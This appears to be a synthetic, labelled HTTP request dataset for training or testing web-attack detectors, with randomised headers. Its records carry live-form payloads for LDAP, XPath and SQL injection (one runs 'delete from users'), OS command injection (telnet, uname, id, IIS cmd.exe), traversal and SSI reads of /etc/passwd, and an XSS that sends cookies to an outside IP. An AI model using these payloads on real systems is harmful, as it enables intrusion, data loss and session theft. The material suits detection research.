UA-Color: color16
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: compress
Upgrade: ioioo1/4.1, ettwpy/6.9, nre0l/0.3, 4aueu/0.2, zaesr/2.7
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37070
Start - Id: 36999
class: LdapInjection
GET /rto3KmLJ073/ec/hkRZNXv1KKKeYg/e6Cjk/d_mZc/2sock_streamlA@BpMxterm/n0qy7FONM-NkG49PTu.png?2iittpia0sZ=5vGVuXhNf3&0telnetDcnph-0dv.KH5F=6473&aoeeenaInrttAp7=hToAwoabootdce&sipch=359222&ISAewp=%29%28+%7C+++%28displayName%3Dhad*%29%28name%3D+had*+++%29%28++mail%3Dhad*+%29&tatee7an=rautoexec1t&toiehm1i2da=785705&06sarboAehh5na=iDnU1xpSIp&i2=xedtsnullxeaaligroup+byneup2 HTTP/1.1
Host: www.rsoakel.be:00742
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1258;q=0.7, iso-8859-2, x-mac-turkish;q=0.1, cp-932;q=0.4
Accept-Encoding: 
Accept-Language: 6b1-g2e, rmS0-iot, C-ecg, awsnin-9oecdJ, 8o-ietD4c5;q=0.6
Cache-Control: max-age=12152
Client-ip: 9.220.179.73
Cookie: naieavesawfoime=apausrvd et=rcpboot.inin\Eapasswd;BBsock_streamIb=4uyaeaaen\
Cookie2: $Version="23"
Date: Fri, 17 Dec 04 01:09:10 UTC
ETag: "KZmphrGa5e_XuG.bz"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Sun, 14 Aug 05 02:12:39 CET
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 502
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: Basic aHhtaHI6YW9zc3lv
Range: 11-,-9658
Referer: http://www.ihgA9.ch/yYbli7y/Ctrshgd1/Fnlgo/tUeus2a.jpg
TE: gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 0.4; xi-et; rv:0.2.0) Gecko/16543455
UA-CPU: PowerPC
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36999
Start - Id: 36802
class: OsCommanding
GET /xtgoiEreneramrrsafrm/rUkVqmBov6HifaRamBzy/eoOgAvurSgR@68OGowa/iyJzTf/urUso4HP38j/reV4aZd1kT7n/OKimgL/llTllpueelrctsay/facrqulBNecof2init.jsp?jiB=%5C%22++%5C%3B++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.ntraetll.com+++20405%5C%3B&6ZzWXiframeid-child0=qz+linkwt6heelfi5L&jGzusrD5=gy2BCQIAvc&esnsdunCg9sjp=gfimgLh%27c4nvmdwrba7&window.open2pshin=ldTW3j0ddZ HTTP/1.0
Host: www.segg.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, compress;q=0.2, gzip;q=0.2, deflate;q=0.1, compress
Accept-Language: *
Cache-Control: no-transform
Cookie: o2teqialg=0;KFform7include=iw7;andalav=Io
Date: Sat, 09 Feb 08 23:00:10 GMT
ETag: "2i-Tsg8qHsrARqq@"
Max-Forwards: 17
Authorization: linee nr8inear=gsne98
Referer: http://www.wtheleH.fr/rgiow/ieb5eh/ai8erke6/bytsb/EtestT9j.nsf
User-Agent: tsatdtNeu/4.1.8
Transfer-Encoding: r8mm; adof=oo0eM

null

End - Id: 36802
Start - Id: 49501
class: XPathInjection
GET /hl9D2T.o-l4BVgC.jpg?dse0cIp2Ox=teqs4O&eotmiego=d3Ibu&ionstp=a9Y9ql-Ne&Uoee6t=%7CncR&st8petne8=ole&TNkjFbgsoundRDq=tMY6u&lmeogee5=17++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++575%3D&Z-LWXlzN3=1&heA7yeomlaR=foni4u1ecajtplibejExmlU&aetuqiss3Rnug=Gohtv&isiewszdsce=90etehttprA&hJdapTsOhmhiN=7160691684&liRtq=mzPSSwUEwD5V&aheu=r-VpDcGxCefx&-SPkFN7h=3202 HTTP/1.1
Host: www.m5ub.it
Connection: jkenlh
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-9;q=0.8, x-mac-hebrew, iso-8859-8-i;q=0.7
Accept-Encoding: *
Accept-Language: e-m2vtpg, l-tl5, IsnAfr6-rr0r;q=0.5, leeS-nlrmn
Cache-Control: max-age=1
Client-ip: 97.199.98.244
Cookie: twpt=oabzim0;um9eak=lcmnr>an)tiA;awzcteisdi=oCbmcAI8W5r;eahinp=898832;ef4ddyeef8ioiay=oa;cmoerHxsc=acolStat8l
Cookie2: $Version="238"
Date: Sun, 02 Dec 07 07:30:37 UTC
ETag: W/"vdwNvb46rS8r1KeBCz3"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Sun, 18 Jun 06 07:37:29 GMT
If-Unmodified-Since: Sat, 19 Jun 04 06:56:04 CET
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: "1_@.nByJ_9pc-HDWlxql"
If-Range: Thu, 14 Jan 10 16:31:05 GMT
Max-Forwards: 2025
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: tnh1u rsoensn=Sbuoti
Range: 2-801463,7709-,5-5829
Referer: http://www.sfzp.de/tunp/fNnsi.txt
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: tey8ag
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 7.6 171.145.143.112, FTP/0.0 15.145.31.115
Transfer-Encoding: Oesrty; mi8cph=suub
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 063 21.35.61.71 "elaoim3oti" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49501
Start - Id: 43197
class: OsCommanding
GET /K4SPrvjIlB6jkX/eMownsqeeps/omGT62TL1Zir6NYS/VEO-t/8Cm49f1X2nEaLJ/wpasswdYY9E6T8.ZIA/eieeqyrf/lTakVor/ounberleahtuhtihG/aO42D-TWg1l0cM.php?dwtueen=ninsert8mail5i&wwt4=uggrotsl&symn=th5i&teyundTns=9xwpnebetfues8Ao&lhgensRllo=e%3A7u8tk+n6shome&pZLvD4UZQFWM=m-w%40lVm41&ciont0nbbns=2E+iBTtat%3FeeFte%25u&YUsZ=ti&nTaeetr2=i&NeiohTnege=8&tbwuhiulo9d3=%5Cnls+++%2Froot%2F&begMf=uNa2q6-&gegtsa=f%25&g1oM=uyxuhtjsaoSo&oOn=ia1 HTTP/1.0
Host: 3.8.84.225:80
Connection: r0ovSuah
Accept: application/*;q=0.6, video/*, image/*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip, identity;q=0.5, identity;q=0.0
Accept-Language: asoioee-itac, lxoorn-d8qtosos, 5s-eo;q=0.2, hraio-amnorwt0, ar8ver-DzeEw9na;q=0.7
Cache-Control: max-age=8873
Client-ip: 157.236.28.151
Cookie: 8NKlog=ji;XM0h9=27;mndhiocef=105;rlmwiUzhsiel=iLJ@Z1
Cookie2: $Version="9"
Date: Mon, 14 Jul 08 14:38:19 GMT
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: 100-continue
From: caRsu@eRisrtRCa8.st
If-Modified-Since: Thu, 18 Oct 07 15:20:57 GMT
If-Unmodified-Since: Mon, 19 Oct 09 19:05:18 GMT
If-Match: *
If-None-Match: "ILRIXSQ1HP8eRae@w"
If-Range: Tue, 07 Nov 06 12:25:48 GMT
Max-Forwards: 75
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: -40670,4905-
Referer: http://www.frio.biz/eepnomxE.cgi
TE: gzip
Trailer: If-Modified-Since
User-Agent: nitaattgehepyn1un
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 6.7 252.91.102.202, ofrilg/3.9 www.yoie.jpeg, 1.3 52.153.17.72
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43197
Start - Id: 36274
class: PathTransversal
GET /ehtyrausty/aTgtrn5IK@IxDggm/aCNWs7N/8KzY/cbhDD/vOtpS9lltople/snXxoQV.hK8qEtMVwV/ewjhhseOcs/ev0j9RsDlc5dTSygDWb/hstaiTu.gif?FscriptcHI1rmochajJ=hb&UdexecmV2b1=+access_log%3C&ohwsExcssjheoae=8184&hdaeaaAke=l&gyN9eaetaa6soet=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: 141.159.120.217
Connection: RnsewoI
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Mtp2-ttaa, Mhmh4Oee-gmoerfI;q=0.5
Cache-Control: min-fresh=11552
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="704"
Date: Sat, 01 Sep 07 15:49:48 UTC
ETag: W/".jBrm6gfYyvDzZY"
Expect: 100-continue
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "n1DaSe8KDh15LfFEA"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 986
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/EdPyb.php3
Referer: /Cni2m/dmps.sh
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 5.4; en-at; rv:5.6.7) Gecko/96661730
UA-OS: Solaris
UA-Pixels: 6917x927
Via: 2.0 www.pgNcu.jpeg, 1.7 www.Nsoaetq.jpg
Transfer-Encoding: deflate
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36274
Start - Id: 42945
class: OsCommanding
GET /fRL/aiheaa4P/vUz.PI4DRoYAP8/tLsgdgtyPaxe47T2/ZC.c7/aale/oturiopptoer1/37N9wp-Ctboot.initSW0/vitw3mpdclm0e/sNqF_bVo_/0ciNgEownfndrmTg.jpeg?1ttorsd=syle6mws&qsprWeetis5ano=91399077&wg8Yid3.logx1=l&e3p5anszn=ciframe%2Bwtsl2Nwoa HTTP/1.1
Host: www.p19p5lnh.ch:5796
Connection: close
Accept: */*;q=0.7
Accept-Charset: euc-jp, x-mac-ce;q=0.3
Accept-Encoding: *
Accept-Language: oI-h;q=0.4, oc-9;q=0.8
Cache-Control: no-transform
Client-ip: 37.112.151.70
Cookie: jas6qh9=he ee(v(n;5wTfaAta=pMmLnbodym01e|w;3eeau1eo=a)unph-u
Cookie2: $Version="9"
Date: Sun, 12 Aug 07 18:48:09 CET
ETag: ".oHd257nZS4yYWszbc-L"
Expect: 100-continue
From: sN6gaeds@i320.fr
If-Modified-Since: Sun, 15 Feb 09 23:49:46 UTC
If-Unmodified-Since: Mon, 24 Nov 08 02:52:36 GMT
If-Match: *
If-None-Match: "j1zF62DyJDRQL23iq@Cv"
If-Range: Tue, 17 Jan 06 03:37:55 UTC
Max-Forwards: 1771
Pragma: no-cache
Authorization: Digest nonce
Range: 617596-54787,237716-,7115-
Referer: http://mqeG.biz/rofw/oogtdoi/bdl6/4Aae1.cgi
Trailer: If-Modified-Since
User-Agent:    ;echo;     w  ;    uname    -a ;id
Via: 6.2 197.110.186.38:382
Transfer-Encoding: identity
Warning: 546 www.tgrptg.jpeg "ljhi5" 
X-Forwarded-For: 59.0.93.67
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42945
Start - Id: 38497
class: LdapInjection
GET /ogG/6iU/ml9WhWdfBnielA/hhooCc2cTnns/su@AW2qi.php?gd=94&m6e=%29+%28%7C++++%28displayName%3Dhad*%29%28name++++%3D+++had*++%29%28+mail%3Dhad*%29&FNpinsertUshutdownvvH-C=b9ssa3rs&araI@0Uwp-8=ax1Mc74FXg&ici=n6itr HTTP/1.1
Host: 127.118.111.162
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: sjsmaFe1-uasmw;q=0.8, syjoE-eGoiei
Cache-Control: hWi8=osBHeqrv
Client-ip: 233.33.102.205
Cookie: QJ95P@DmNoaX=ahejtaxoiernph-e;ntkrAATl9aerade=lto
Cookie2: $Version="61"
Date: Sun, 12 Jul 09 19:48:10 GMT
ETag: "J-fv2rP2MOgclBTG"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: "lQWJJiaCGPvkctv1ZF1q"
If-None-Match: "O_Y@lMwjEDIcLyO.5g"
If-Range: *
Max-Forwards: 0349
MIME-Version: 3.3
Pragma: 7='Y'
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Basic aXVSZW86cnNtNw==
Range: 108364-
Referer: /tWrl.sh
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 8.5; Ey-av; rv:0.4.6) Gecko/97433914
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: hiE/0.7, ube/1.1
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38497
Start - Id: 41808
class: SqlInjection
GET /sWNxE/oenohiyrdEo/2FQKXEmetadZsLhS/l.1t/tKz0xWEDb3UZB2ak/hhjB1/8jjI9k9YuNjZ/pqwZFZ0TvjYW-BZ/mTnthcttindckxdenld.jpeg?5bcEbusLat7iie=cULEQtJjM&wAerMer=76038749&udfPnlseIt=%27%29%3B+++++delete+++from+users%3B+++commit%3B++dummy%28+++%27 HTTP/1.0
Host: 153.27.145.152
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: y9biOGTt-6lotno;q=0.6, tgahcET-otn0nryl;q=0.2, oiWtdufw-Ldunw, yrt1reel-rAntsTAZ
Cache-Control: min-fresh=345
Client-ip: 175.74.180.28
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="94"
Date: Sun, 17 Sep 06 18:05:18 CET
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 30 Jul 09 02:26:45 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: "hFmuvj6yMnDQwi16iP"
Max-Forwards: 500
MIME-Version: 8.0
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Basic Y0V0TzpyTmM4UmY=
Range: 340098-821
Referer: /uove/snhlIp2e.bin
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: ayswiw (tfLUfvJ; yUVp3Xox; sMcGG32A)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41808
Start - Id: 48272
class: XSS
PUT /epgyz/aoIMSFZ/eBM/czp4h0/MdST.msf? HTTP/1.0
Content-Length: 15
Content-Language: 9be
Content-Encoding: deflate
Content-Location: /imeqqDj/2ss3jnp.pdf
Content-MD5: ZVMyc29hZWl0am5yZXRoSw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 11:00:42 UTC
Last-Modified: Thu, 25 May 06 12:33:27 UTC
Host: www.sNhNrsan.org:80
Connection: close
Accept: video/*, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 4.38.79.185
Cookie: kv4lc0mSUi1=<body    onload  =  "  [alert ('nasbdp');]     "    >
Cookie2: $Version="923"
Date: Wed, 21 Feb 07 15:09:13 CET
ETag: W/"mbgq-B3kQSBMQQgn"
Expect: li6e0=ei63o0tf;l9gea=Jm5zu
If-Modified-Since: Fri, 07 Oct 05 11:44:20 GMT
If-Unmodified-Since: Sat, 01 Jul 06 15:04:36 GMT
If-Match: *
If-None-Match: *
If-Range: "tZn4R07mmhK7BKRTDfR"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: e8eeh mFinPerr=qMkohi0
Authorization: Basic b3Jlbnc6dGZkU2U=
Range: 44087-7032,84351-07
Referer: /vpomqs.mdb
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 5.9; ys-de; rv:8.6.3) Gecko/40759243
UA-CPU: x86
UA-Color: color8
Via: HTTP/6.9 252.76.195.82
Transfer-Encoding: nnathl
Upgrade: embo/8.5, uxtTs/2.4, seigc/8.0
----: -------------------------------------

iegra9oitnD=855

End - Id: 48272
Start - Id: 49419
class: XPathInjection
GET /tcht/1kOBjay8Q/oec/00a64cgAgm5passwdk2/gmj9DtmpD2/LYx5kKRgOduhj/i8-passthru/saoOhhiigRadiiihhee.shtml?Vchhejs=sly&wOXTJ=anf%2FrO8%2FeTsg%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+or+++++%27giaso%27+++%3D+++%27 HTTP/1.0
Host: www.eoCyeioB.com:80
Connection: keep-alive
Accept: audio/*;q=0.7, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: ia9qeem0=lOa
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Fri, 06 Feb 04 23:31:19 GMT
ETag: W/"yBi@1NQdLHx8ApZv.y"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "zFH-fiV70ESDf9."
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: Tue, 01 Mar 05 22:19:48 CET
Max-Forwards: 0016
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic cHRoeWc1OnJnaGEyZHR0
Authorization: Digest nc=A74a4Ae1
Range: 77585-376599
Referer: /ssgr/omciaetl/ebbty/7dth/aiqnaoEc.php3
TE: gzip,chunked,deflate;q=0.7
Trailer: Warning
User-Agent: oeeittied
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 8.4 191.223.218.165:1907, FTP/3.1 www.tHc9Nw.js
Transfer-Encoding: gzip
Upgrade: nostnl/9.9, gueoi/6.9, Nceiet/2.3, aiOs/0.5, fiuA/5.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 222.117.148.160
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49419
Start - Id: 35924
class: PathTransversal
GET /gxtermDGurrJhYdocumentYS/x0w/sbe/chavingx3JpsYxmlmB/watYJDAIt15/qouohxu4s/aaNpjqfBbEAAZh6/4smoBxlopbef0Sam/eHd.jpeg?Uralqt2dtygd5=9643590&ean=muo&2isbS=s-Cfoniho%40mP&idc9ohoneu4wmer=2824083&WK6MmSb=%3F%3E&rsvleet=b%25&efi4Sigovorsy=1128188&fasseann=Rxci%2F%3Ce+en&ii0dptorni9a=rD9zDz7NH9jl&areetfa=8921095&trctit=dkuVnico&TsbEb=nmEfjTeieih7wo2g6&nNke2=a22 HTTP/1.0
Host: www.snlsdrlem.st
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Cookie: W435VAreplaceb=<!--#include   virtual="/etc/passwd"-->;lioye8tx9n=bxMwm8Q6b;deosmoaietsraR=epteonull?aipinnifc)<;i4l0ahnig3ke=mh1E378eImeaE4Htua;naneedU=jegU;OMC3openIP9=Rld 
Date: Thu, 22 Feb 07 23:48:09 GMT
Expect: dmlof=wtosr;aasu=edtry
If-Modified-Since: Tue, 09 Mar 04 03:21:03 CET
If-Match: *
If-Range: *
Max-Forwards: 7469
Pragma: qus=smrbqiv
Referer: http://Ue5wo.gov/mtuve/ecff/nesrg/wlftijbu/hitu4o.pl
Trailer: Expect
User-Agent: ojcsTd7B http://www.eeryi6.fr
Via: HTTP/8.9 153.32.31.116, oeagee/7.0 www.a3trt.html, 4.0 252.124.31.167
Transfer-Encoding: deflate

null

End - Id: 35924
Start - Id: 44003
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.5s1abrla.uk
Connection: close
Accept: video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: a-ohuar;q=0.3
Cache-Control: no-cache
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="3"
Date: Sun, 18 Apr 10 08:18:59 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 31 Oct 04 13:16:19 GMT
If-Match: "E@teygm54glXv28"
If-None-Match: *
If-Range: Sat, 24 Oct 09 04:00:21 GMT
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: i='64tnhai'
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: NTLM aXZySWk0Z2FkZG8xY3RjZXI4ZWlodGloclpjQWRQMHBsZXM=
Range: 709-56
Referer: /iSNu/npryhru/hefee/i7rZtv.nsf
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.5 (X11; U; Linux i586 1.1; oe-ry; rv:8.1.0) Gecko/30550736
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: FTP/2.3 18.125.185.17
Transfer-Encoding: gzip
Upgrade: rnr/0.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44003
Start - Id: 46878
class: XSS
POST /dE/o0/zfNe/oCpC9z2O3fMKZr/wxWhAg2u2R/krat/uaehfrcaeh/in9.bin? HTTP/1.0
Content-Length: 298
Content-Language: c
Content-Encoding: identity
Content-Location: /lur0rsey/e24bs/hxwjOar.swf
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Apr 07 18:53:00 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: www.tira5eod.net
Connection: close
Accept: application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: ony-r
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: P8eslanoeg=sebWNaarth
Cookie2: $Version="8"
Date: Thu, 25 Mar 10 23:19:21 CET
ETag: "qpH2R-@HEM1V6hUP"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 29 Aug 06 04:22:28 GMT
If-Unmodified-Since: Fri, 08 May 09 05:57:59 CET
If-Match: "jJM02KeP8B2r3rl"
If-None-Match: *
If-Range: *
Max-Forwards: 840
MIME-Version: 8.9
Pragma: cg4nhm=dy
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest nonce
Range: -692,548156-61437,-79
Referer: http://om0cjug.uk/sloauydi/ssnicp.txt
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: b8ine8eaiqh4ersa
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2245x173
Via: HTTP/5.0 62.205.116.88:87
Transfer-Encoding: ms8en
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MEmMn=<img   src   = " livescript:[window.open('http://72.209.60.228/tiol.aspx'+document.cookie);]      "  >&ljC6odjeth=4Nlyi&pte6o=Ccews2fp&tdlpupipaxogshe=jEVsIk&ffnmavaz=hdigiScy6&attnaheoh9x=f8Sqpkc&pQPtGMKhMbodyP=caas&orad4tleye=4896420&8cigyF=4447&@.uvo=eu

End - Id: 46878
Start - Id: 40777
class: SSI
PUT /8CMuhAb@4/tle6otsadaierot1iOfd/d1/Erga/zQG_ql.childa0W/scdj9ahlntathrcit/oMqf1W/sTj.html? HTTP/1.0
Content-Length: 237
Content-Language: 0f3ojh,ltnH
Content-Encoding: gzip
Content-Location: http://tihSi.st/Xcsa/eec8/esdaaae/Otoc.bin
Content-MD5: Y2dvdHJiOTB0OWhhN25pYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Aug 07 13:20:37 GMT
Last-Modified: Sun, 17 Apr 05 14:30:09 CET
Host: www.odoseni8d.uk
Connection: keep-alive
Accept: text/html;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: hc0Heltf-tktuTn4;q=0.7, et-emkrcdr;q=0.5, ncHlt3-ir;q=0.3, bg-pg7gn;q=0.3, h1vrkj-o;q=0.6
Cache-Control: only-if-cached
Cookie: 4eiitt4=801;Elkforma=66586033;aey8ir1aeubl8i=009627816;mu=58782;e0tdn=wp-oza|teyos Ep 0l
Cookie2: $Version="096"
Date: Wed, 25 Oct 06 24:46:35 GMT
ETag: "_4SMIhw0@m0IpS4g"
Expect: 100-continue
From: cLaa@tnaEOe.cz
If-Modified-Since: Sun, 07 Oct 07 13:23:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
Pragma: eswy=N
Proxy-Authorization: Digest opaque="lnld"
Authorization: mlme5 ehrrd=Notplt
Range: 35-,-4
Referer: http://www.aKge.ch/aneuandt/hTliotA/tahtd.png
User-Agent: Mozilla/5.0 (compatible; Konqueror/8.1; Solaris; sOesi; neow5foswe)
Via: ies/4.5 www.5tubise.png:379, FTP/7.6 www.4gcto3.htm:64, HTTP/6.9 203.70.245.142
Transfer-Encoding: identity
Warning: 370 www.fpazeosi.tiff "AewOdth" 
----: -----------------------------------------

